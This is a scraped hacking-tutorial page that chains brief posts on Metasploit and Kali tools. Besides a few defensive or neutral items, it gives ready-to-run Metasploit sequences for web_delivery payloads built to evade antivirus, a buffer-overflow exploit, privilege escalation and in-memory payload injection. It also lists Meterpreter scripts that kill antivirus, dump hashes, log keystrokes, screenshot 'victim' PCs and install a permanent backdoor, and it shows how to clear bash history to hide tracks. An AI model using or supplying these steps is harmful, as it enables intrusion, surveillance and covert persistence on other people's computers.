How to Catch Meterpreter Session in your Computer

Name of tool is antipwny.it's Free!Download.





Authors: Rohan Vazarkar, David Bitner

A host based IDS/IPS written in C#, targeted at Metasploit Payloads.
Instructions

AntiPwny requires .NET Framework 4.5, which can be acquired here. An offline installer is available here

Pre-compiled binaries can be found in the exe folder in the root directory. Make sure you use the proper platform or you will get errors! The DLL file included is necessary for AntiPwny to run.

AntiPwny was compiled using Visual Studio 2012 Professional. To compile it yourself, check out the source and compile it against your target platform.

Current Features

•     Scans Registry for Meterpreter Persistence/MetSvc
•     Active Memory Scans to detect Meterpreter
•     IDS/IPS Mode
•     View outbound connections in compromised processes
•     Self-Detection for Migrated Meterpreter

Detected Payloads

•     Meterpreter
•     Java Meterpreter
•     Reverse Shell

How to search exploits in metasploit in Kali Linux

How to Get Information of Antivirus in Remote Victim PC using Metasploit

Windows Antivirus Exclusions Enumeration

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Module Name

post/windows/gather/enum_av_excluded

msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
            ...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
            ...show and set options...
msf post(enum_av_excluded) > run

Web Delivery metasploit Script

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
            ...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
            ...show and set options...

msf exploit(web_delivery) > exploit

   

Parsero - reads the Robots.txt file of a web server

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines what directories or files hosted on a web server mustn’t be indexed. For example, “Disallow: /portal/login” means that the content on www.example.com/portal/login it’s not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is the way the administrator have to not share sensitive or private information with the search engines.

But sometimes these paths typed in the Disallows entries are directly accessible by the users without using a search engine, just visiting the URL and the Path, and sometimes they are not available to be visited by anybody… Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.

Also, the fact the administrator write a robots.txt, it doesn’t mean that the files or directories typed in the Dissallow entries will not be indexed by Bing, Google, Yahoo… For this reason, Parsero is capable of searching in Bing to locate content indexed without the web administrator authorization. Parsero will check the HTTP status code in the same way for each Bing result.

Source: https://github.com/behindthefirewalls/Parsero

You can get all the latest info about Parsero from http://www.behindthefirewalls.com/search/?q=parsero

Installing

There are three ways to install Parsero easily.

By using setup.py script

sudo setup.py install

By using pip3

sudo apt-get install python3-pip
sudo pip3 install parsero

In Kali Linux

sudo apt-get update
sudo apt-get install parsero

A-PDF WAV to MP3 v1.0.0 Buffer Overflow

This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

exploit : exploit/windows/fileformat/a_pdf_wav_to_mp3

msf > use exploit/windows/fileformat/a_pdf_wav_to_mp3 msf exploit(a_pdf_wav_to_mp3) > show targets
...targets...
msf exploit(a_pdf_wav_to_mp3) > set TARGET <target-id>
msf exploit(a_pdf_wav_to_mp3) > show options
...show and set options...
msf exploit(a_pdf_wav_to_mp3) > exploit

Windows Gather Enum User MUICache metasploit module

This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.

Module : post/windows/gather/enum_muicache

msf > use post/windows/gather/enum_muicache 
msf post(enum_muicache) > sessions
         ...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
        ...show and set options...
msf post(enum_muicache) > run

How to install Nessus Vulnerability Scanner in Ubuntu

Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools.

Click here to Download Nessus for Ubuntu

route analysis with 0trace.sh in Kali Linux

0trace.sh is a shell script written by Michal Zalewski. It is a reconnaissance / firewall bypassing tool that enables hop enumeration ("traceroute") within an established TCP connection, such as a HTTP or SMTP session. This is opposed to sending stray packets, as traceroute-type tools usually do. In case of a successful scan, 0trace provides useful additional servers for the penetration tester.

VIDEO TUTORIAL : 

How to install screenlets in ubuntu/linux

Screenlets are small owner-drawn applications (written in Python) that can be described as "the virtual representation of things lying/standing around on your desk". Sticky notes, clocks, rulers, ... the possibilities are endless.

The goal of the Screenlets base-classes is to simplify the creation of fully themable mini-apps that each solve basic desktop-work-related needs and generally improve the usability and eye-candy of the modern composited Linux-desktop.

Features:

• Real applications, no HTML-"widgets"
• Easy to use, easy to develop
• Full compositing support
• Works with any composited X desktop (compiz, xfce4, ...)
• Works also on non-composited desktop
• Included ability to apply themes (SVG, PNG or mixed)
• Fully scalable when using SVGs
• Embedded drag&drop-support
• Automated storing of options (using ini or GConf)
• Controllable through customizable D-Bus service
• Can be used together with compiz' widget-plugin to create a Dashboard-like feature as seen on OS X
• Uses Cairo and GTK2 for drawing and windowing

VIDEO TUTORIAL : 

How to run screenlets as root in ubuntu/linux

Reflective DLL Injection Metasploit Module

 

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download  : Reflective DLL Injection Exploit

VIDEO TUTORIAL : 

Windows Manage Memory Payload Injection

This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject

VIDEO :  
 

How to Clear bash history

Command : history -cw

Windows SYSTEM Escalation via KiTrap0D

This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

exploit : exploit/windows/local/ms10_015_kitrap0d

Targets : Windows 2K SP4 - Windows 7 (x86)

Win32ksys elevation of privilege vulnerability

win32k.sys is kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability." 

 Vulnerable system : windows XP SP3,windows 2003 SP2,Windows 7 SP1,Windows 2008 32bit and Windows 2008 R2 SP1 64bit

Click Here to Get exploit

WebSploit Framework : java applet attack

WebSploit Is An Open Source Project For :

Social Engineering Works
Scan,Crawler & Analysis Web
Automatic Exploiter
Support Network Attacks
Autopwn - Used From Metasploit For Scan and Exploit Target Service
wmap - Scan,Crawler Target Used From Metasploit wmap plugin
format infector - inject reverse & bind payload into file format
phpmyadmin Scanner
CloudFlare resolver
LFI Bypasser
Apache Users Scanner
Dir Bruter
admin finder
MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
MITM - Man In The Middle Attack
Java Applet Attack
MFOD Attack Vector
USB Infection Attack
ARP Dos Attack
Web Killer Attack
Fake Update Attack
Fake Access point Attack
Wifi Honeypot
Wifi Jammer
Wifi Dos
Bluetooth POD Attack

The Java Applet Attack considers as one of the most successful and popular methods for compromising a system.Popular because we can create the infected Java applet very easily,we can clone any site we want that will load the applet very fast

The Java applet Attack vector affects:

• Windows Systems
• Linux Systems and
• Mac OS X 

Click here to Download WebSploit Framework 

Xprobe2 - active OS fingerprinting tool

Xprobe2 is use for perform fingerprinting on remote target.

Download Xprobe2

Installation(Bactrack and kali Linux has built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target(traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set receive timeout to receive_timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set packsending delay (milseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Options forces TCP handshake module to try to guess open TCP port

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.

Nmap Firewalk Script

it's usefull for discover firewall rules using an IP TTL expiration technique known as firewalking.

Example Usage

nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Download : Nmap Firewalk Script

Best Meterpreter Script

getcountermeasure

Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

Winenum script is used to dump tokens, hashes and more

Command : run winenum

getgui

getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav used to disable most antivirus programs.

Command : run killav
gettelnet

gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

Hostedit Meterpreter script is used to edit host file of windows

Command : run hostedit

checkvm

Checkvm used to see if you exploited a virtual machine

Command : run checkvm

screenspy

screenspy used to take screenshot of remote pc.

Command : run screenspy

keylogrecorder

keylogrecorder used to start keylogger in victim pc.

Command : run keylogrecorder

metsvc

used to make permanent backdoor

How to get MUICache Entries in Remote Windows Machine

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit